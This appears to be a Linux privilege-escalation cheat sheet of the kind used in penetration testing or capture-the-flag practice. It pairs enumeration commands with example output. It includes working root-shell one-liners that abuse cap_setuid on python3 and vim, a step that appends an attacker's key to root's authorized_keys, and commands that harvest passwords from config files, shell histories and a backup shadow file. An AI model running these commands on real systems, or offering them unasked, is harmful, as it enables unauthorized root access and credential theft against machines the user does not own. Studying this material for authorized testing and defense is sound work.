FILE PERMISSIONS & CAPABILITIES
World-writable files
Files anyone can modify — Config files, scripts, binaries
find / -writable -type f 2>/dev/null | grep -v proc
Example Output
find / -writable -type f 2>/dev/null
/etc/passwd <- can add root user!
/opt/app/config.py <- can inject code
/var/www/html/index.php <- can add webshell
World-writable directories
Directories anyone can write to — Drop files for path hijack
find / -writable -type d 2>/dev/null
Example Output
find / -writable -type d 2>/dev/null
/tmp
/var/tmp
/opt/app/plugins/ <- can drop files here
/usr/local/bin/ <- PATH hijack possible
Linux capabilities
Capabilities on binaries — cap_setuid = instant root
getcap -r / 2>/dev/null
Example Output
getcap -r / 2>/dev/null
/usr/bin/python3 = cap_setuid+ep <- instant root!
/usr/bin/ping = cap_net_raw+ep <- normal, ignore
python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'
# whoami
root
Capability abuse
GTFOBins for capabilities too — Capabilities are like mini-SUID
python3 with cap_setuid:
python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'
Example Output
getcap shows: /usr/bin/python3 = cap_setuid+ep
python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'
# whoami
root
OR: /usr/bin/vim = cap_setuid+ep
vim -c ':py3 import os; os.setuid(0); os.execl("/bin/sh","sh")'
SSH keys
Private keys for other users — SSH as root or other user
find / -name 'id_rsa' -o -name 'authorized_keys' -o -name '*.pem' 2>/dev/null
ls -la /home/*/.ssh/
ls -la /root/.ssh/
Example Output
find / -name id_rsa 2>/dev/null
/home/admin/.ssh/id_rsa
/root/.ssh/id_rsa <- root's key!
/opt/backups/.ssh/id_rsa
find / -name authorized_keys -writable 2>/dev/null
/root/.ssh/authorized_keys <- WRITABLE!
echo 'your_pub_key' >> /root/.ssh/authorized_keys
ssh root@localhost
(Write your key = root SSH access)
Readable config files
Database passwords, API keys — Password reuse is common
find / -name '*.conf' -readable 2>/dev/null
find / -name '*.config' -readable 2>/dev/null
find / -name 'wp-config*' 2>/dev/null
Example Output
find / -name '*.conf' -readable 2>/dev/null
/etc/apache2/sites-enabled/000-default.conf
/var/www/html/wp-config.php
cat wp-config.php:
define('DB_PASSWORD', 'WordPressDBp@ss!');
(Database credentials)
History files
Previous commands — May contain typed passwords
cat ~/.bash_history
cat /home/*/.bash_history 2>/dev/null
cat ~/.mysql_history
Example Output
cat /home/admin/.bash_history
mysql -u root -p'S3cretDBP@ss'
ssh root@10.10.10.20
sudo su - backup_user
(Passwords typed in commands)
Backup files
Backup files with old configs — Old passwords, keys
find / -name '*.bak' -o -name '*.old' -o -name '*.backup' -o -name '*.zip' -o -name '*.tar.gz' 2>/dev/null
Example Output
find / -name '*.bak' -o -name '*.old' 2>/dev/null
/var/backups/shadow.bak <- old shadow file!
/opt/config.old <- old config with passwords
cat /var/backups/shadow.bak
root:$6$oldhash...
/opt and /srv
Custom installed applications — Often misconfigured
ls -la /opt/
ls -la /srv/
Example Output
ls -la /opt/
drwxrwxrwx admin app_v2/ <- writable custom app!
-rwsr-xr-x root monitor <- SUID custom binary!
ls -la /srv/
drwxr-xr-x root web/ <- alternative web root